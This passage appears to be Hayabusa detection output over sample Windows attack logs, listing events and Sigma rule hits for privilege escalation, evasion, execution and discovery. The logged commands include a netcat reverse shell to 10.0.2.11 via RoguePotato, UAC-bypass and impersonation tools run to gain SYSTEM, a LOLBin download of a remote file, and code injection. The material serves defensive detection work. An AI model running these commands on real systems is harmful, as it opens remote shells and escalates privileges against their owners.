AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: 
C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e 
cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 
Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:50.327 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of 
NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx -2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx -2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: chost.exe payload.bin : Path: 
C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious 
Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx -2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx -2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket 
